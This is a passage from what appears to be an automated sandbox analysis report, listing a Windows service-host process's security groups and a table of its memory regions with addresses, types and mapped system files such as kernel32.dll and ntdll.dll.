os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1248
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1249
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1250
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1251
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1252
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1253
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1254
start_va = 0x140000
end_va = 0x140fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 1255
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 1256
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1257
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 1258
start_va = 0x180000
end_va = 0x180fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 1259
start_va = 0x190000
end_va = 0x19afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 1260
start_va = 0x1a0000
end_va = 0x1acfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 1261
start_va = 0x1b0000
end_va = 0x1b3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskcomp.dll.mui"
filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui")
Region:
id = 1262
start_va = 0x1c0000
end_va = 0x1c9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schedsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui")
Region:
id = 1263
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1264
start_va = 0x1e0000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1265
start_va = 0x2e0000
end_va = 0x3dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 1266
start_va = 0x3e0000
end_va = 0x3e1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 1267
start_va = 0x3f0000
end_va = 0x3f3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1268
start_va = 0x400000
end_va = 0x401fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 1269
start_va = 0x410000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db")
Region:
id = 1270
start_va = 0x440000
end_va = 0x443fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1271
start_va = 0x450000
end_va = 0x45dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 1272
start_va = 0x460000
end_va = 0x467fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 1273
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 1274
start_va = 0x480000
end_va = 0x607fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000480000"
filename = ""
Region:
id = 1275
start_va = 0x610000
end_va = 0x790fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000610000"
filename = ""
Region:
id = 1276
start_va = 0x7a0000
end_va = 0x85ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007a0000"
filename = ""
Region:
id = 1277
start_va = 0x860000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000860000"
filename = ""
Region:
id = 1278
start_va = 0x8e0000
end_va = 0x8e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008e0000"
filename = ""
Region:
id = 1279
start_va = 0x8f0000
end_va = 0x90bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 1280
start_va = 0x910000
end_va = 0x910fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000910000"
filename = ""
Region:
id = 1281
start_va = 0x920000
end_va = 0x920fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000920000"
filename = ""
Region:
id = 1282
start_va = 0x930000
end_va = 0x9affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000930000"
filename = ""
Region:
id = 1283
start_va = 0x9b0000
end_va = 0x9b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wshtcpip.dll.mui"
filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui")
Region:
id = 1284
start_va = 0x9c0000
end_va = 0x9c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wship6.dll.mui"
filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui")
Region:
id = 1285
start_va = 0x9d0000
end_va = 0xa4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 1286
start_va = 0xa50000
end_va = 0xab5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 1287
start_va = 0xac0000
end_va = 0xac0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ac0000"
filename = ""
Region:
id = 1288
start_va = 0xad0000
end_va = 0xad0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 1289
start_va = 0xae0000
end_va = 0xaf9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ae0000"
filename = ""
Region:
id = 1290
start_va = 0xb00000
end_va = 0xb00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b00000"
filename = ""
Region:
id = 1291
start_va = 0xb10000
end_va = 0xb17fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b10000"
filename = ""
Region:
id = 1292
start_va = 0xb20000
end_va = 0xb2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b20000"
filename = ""
Region:
id = 1293
start_va = 0xb30000
end_va = 0xb3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b30000"
filename = ""
Region:
id = 1294
start_va = 0xb40000
end_va = 0xb4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b40000"
filename = ""
Region:
id = 1295
start_va = 0xb50000
end_va = 0xbcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1296
start_va = 0xbd0000
end_va = 0xe9efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1297
start_va = 0xea0000
end_va = 0xea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ea0000"
filename = ""
Region:
id = 1298
start_va = 0xeb0000
end_va = 0xf2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000eb0000"
filename = ""
Region:
id = 1299
start_va = 0xf30000
end_va = 0x102ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f30000"
filename = ""
Region:
id = 1300
start_va = 0x1030000
end_va = 0x103ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001030000"
filename = ""
Region:
id = 1301
start_va = 0x1040000
end_va = 0x104ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001040000"
filename = ""
Region:
id = 1302
start_va = 0x1050000
end_va = 0x105ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001050000"
filename = ""
Region:
id = 1303
start_va = 0x1060000
end_va = 0x106ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001060000"
filename = ""
Region:
id = 1304
start_va = 0x1070000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001070000"
filename = ""
Region:
id = 1305
start_va = 0x1080000
end_va = 0x108ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001080000"
filename = ""
Region:
id = 1306
start_va = 0x1090000
end_va = 0x1091fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 1307
start_va = 0x10a0000
end_va = 0x111ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010a0000"
filename = ""
Region:
id = 1308
start_va = 0x1120000
end_va = 0x119ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 1309
start_va = 0x11a0000
end_va = 0x11a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011a0000"
filename = ""
Region:
id = 1310
start_va = 0x11b0000
end_va = 0x11b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000011b0000"
filename = ""
Region:
id = 1311
start_va = 0x11c0000
end_va = 0x123ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 1312
start_va = 0x1240000
end_va = 0x124ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001240000"
filename = ""
Region:
id = 1313
start_va = 0x1250000
end_va = 0x125ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001250000"
filename = ""
Region:
id = 1314
start_va = 0x1260000
end_va = 0x126ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 1315
start_va = 0x1270000
end_va = 0x127ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001270000"
filename = ""
Region:
id = 1316
start_va = 0x1280000
end_va = 0x128ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001280000"
filename = ""
Region:
id = 1317
start_va = 0x1290000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001290000"
filename = ""
Region:
id = 1318
start_va = 0x12a0000
end_va = 0x12affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012a0000"
filename = ""
Region:
id = 1319
start_va = 0x12b0000
end_va = 0x12bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012b0000"
filename = ""
Region:
id = 1320
start_va = 0x12c0000
end_va = 0x12c7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012c0000"
filename = ""
Region:
id = 1321
start_va = 0x12d0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012d0000"
filename = ""
Region:
id = 1322
start_va = 0x12e0000
end_va = 0x135ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 1323
start_va = 0x1360000
end_va = 0x136ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001360000"
filename = ""
Region:
id = 1324
start_va = 0x1370000
end_va = 0x1377fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 1325
start_va = 0x1380000
end_va = 0x138ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1326
start_va = 0x1390000
end_va = 0x139ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 1327
start_va = 0x13a0000
end_va = 0x13affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013a0000"
filename = ""
Region:
id = 1328
start_va = 0x13b0000
end_va = 0x13bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013b0000"
filename = ""
Region:
id = 1329
start_va = 0x13c0000
end_va = 0x13cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013c0000"
filename = ""
Region:
id = 1330
start_va = 0x13d0000
end_va = 0x144ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000013d0000"
filename = ""
Region:
id = 1331
start_va = 0x1450000
end_va = 0x1457fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001450000"
filename = ""
Region:
id = 1332
start_va = 0x1460000
end_va = 0x14dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001460000"
filename = ""
Region:
id = 1333
start_va = 0x14e0000
end_va = 0x155ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014e0000"
filename = ""
Region:
id = 1334
start_va = 0x1560000
end_va = 0x156ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001560000"
filename = ""
Region:
id = 1335
start_va = 0x1580000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001580000"
filename = ""
Region:
id = 1336
start_va = 0x1630000
end_va = 0x16affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001630000"
filename = ""
Region:
id = 1337
start_va = 0x16b0000
end_va = 0x172ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000016b0000"
filename = ""
Region:
id = 1338
start_va = 0x1750000
end_va = 0x175ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001750000"
filename = ""
Region:
id = 1339
start_va = 0x1770000
end_va = 0x17effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001770000"
filename = ""
Region:
id = 1340
start_va = 0x1830000
end_va = 0x18affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001830000"
filename = ""
Region:
id = 1341
start_va = 0x18c0000
end_va = 0x193ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000018c0000"
filename = ""
Region:
id = 1342
start_va = 0x1940000
end_va = 0x197ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001940000"
filename = ""
Region:
id = 1343
start_va = 0x1980000
end_va = 0x19bffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001980000"
filename = ""
Region:
id = 1344
start_va = 0x19e0000
end_va = 0x1a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000019e0000"
filename = ""
Region:
id = 1345
start_va = 0x1ab0000
end_va = 0x1b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ab0000"
filename = ""
Region:
id = 1346
start_va = 0x1b50000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b50000"
filename = ""
Region:
id = 1347
start_va = 0x1bd0000
end_va = 0x1c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bd0000"
filename = ""
Region:
id = 1348
start_va = 0x1c50000
end_va = 0x1ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 1349
start_va = 0x1d60000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d60000"
filename = ""
Region:
id = 1350
start_va = 0x1e60000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 1351
start_va = 0x1f90000
end_va = 0x200ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f90000"
filename = ""
Region:
id = 1352
start_va = 0x2080000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002080000"
filename = ""
Region:
id = 1353
start_va = 0x2140000
end_va = 0x21bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 1354
start_va = 0x21f0000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 1355
start_va = 0x2270000
end_va = 0x236ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002270000"
filename = ""
Region:
id = 1356
start_va = 0x23b0000
end_va = 0x23bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 1357
start_va = 0x23d0000
end_va = 0x244ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023d0000"
filename = ""
Region:
id = 1358
start_va = 0x2450000
end_va = 0x24cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002450000"
filename = ""
Region:
id = 1359
start_va = 0x24d0000
end_va = 0x254ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024d0000"
filename = ""
Region:
id = 1360
start_va = 0x2560000
end_va = 0x25dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002560000"
filename = ""
Region:
id = 1361
start_va = 0x25e0000
end_va = 0x26dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025e0000"
filename = ""
Region:
id = 1362
start_va = 0x2730000
end_va = 0x27affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 1363
start_va = 0x27c0000
end_va = 0x27cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 1364
start_va = 0x27d0000
end_va = 0x28cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 1365
start_va = 0x2910000
end_va = 0x298ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 1366
start_va = 0x2a50000
end_va = 0x2b4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 1367
start_va = 0x2b50000
end_va = 0x2c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 1368
start_va = 0x2c70000
end_va = 0x2d2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1369
start_va = 0x2d50000
end_va = 0x2dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d50000"
filename = ""
Region:
id = 1370
start_va = 0x2de0000
end_va = 0x2e5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002de0000"
filename = ""
Region:
id = 1371
start_va = 0x2ec0000
end_va = 0x2f3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ec0000"
filename = ""
Region:
id = 1372
start_va = 0x2f40000
end_va = 0x2fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f40000"
filename = ""
Region:
id = 1373
start_va = 0x2fd0000
end_va = 0x304ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002fd0000"
filename = ""
Region:
id = 1374
start_va = 0x3090000
end_va = 0x310ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 1375
start_va = 0x3110000
end_va = 0x330ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 1376
start_va = 0x3310000
end_va = 0x340ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003310000"
filename = ""
Region:
id = 1377
start_va = 0x3430000
end_va = 0x34affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003430000"
filename = ""
Region:
id = 1378
start_va = 0x34b0000
end_va = 0x352ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000034b0000"
filename = ""
Region:
id = 1379
start_va = 0x3540000
end_va = 0x35bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003540000"
filename = ""
Region:
id = 1380
start_va = 0x35c0000
end_va = 0x363ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000035c0000"
filename = ""
Region:
id = 1381
start_va = 0x3740000
end_va = 0x37bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003740000"
filename = ""
Region:
id = 1382
start_va = 0x3870000
end_va = 0x38effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003870000"
filename = ""
Region:
id = 1383
start_va = 0x3910000
end_va = 0x398ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003910000"
filename = ""
Region:
id = 1384
start_va = 0x39d0000
end_va = 0x3a4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039d0000"
filename = ""
Region:
id = 1385
start_va = 0x3a70000
end_va = 0x3aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a70000"
filename = ""
Region:
id = 1386
start_va = 0x3b30000
end_va = 0x3baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b30000"
filename = ""
Region:
id = 1387
start_va = 0x3bb0000
end_va = 0x3faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003bb0000"
filename = ""
Region:
id = 1388
start_va = 0x3ff0000
end_va = 0x406ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ff0000"
filename = ""
Region:
id = 1389
start_va = 0x40d0000
end_va = 0x414ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000040d0000"
filename = ""
Region:
id = 1390
start_va = 0x41d0000
end_va = 0x424ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041d0000"
filename = ""
Region:
id = 1391
start_va = 0x4290000
end_va = 0x430ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004290000"
filename = ""
Region:
id = 1392
start_va = 0x43b0000
end_va = 0x442ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000043b0000"
filename = ""
Region:
id = 1393
start_va = 0x4480000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004480000"
filename = ""
Region:
id = 1394
start_va = 0x4500000
end_va = 0x46fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004500000"
filename = ""
Region:
id = 1395
start_va = 0x4700000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004700000"
filename = ""
Region:
id = 1396
start_va = 0x4800000
end_va = 0x487ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 1397
start_va = 0x48a0000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048a0000"
filename = ""
Region:
id = 1398
start_va = 0x4950000
end_va = 0x49cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 1399
start_va = 0x49d0000
end_va = 0x4acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000049d0000"
filename = ""
Region:
id = 1400
start_va = 0x4b30000
end_va = 0x4baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b30000"
filename = ""
Region:
id = 1401
start_va = 0x4bb0000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 1402
start_va = 0x4bc0000
end_va = 0x5bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 1403
start_va = 0x5bc0000
end_va = 0x5cbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005bc0000"
filename = ""
Region:
id = 1404
start_va = 0x5cc0000
end_va = 0x5dbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cc0000"
filename = ""
Region:
id = 1405
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1406
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1407
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
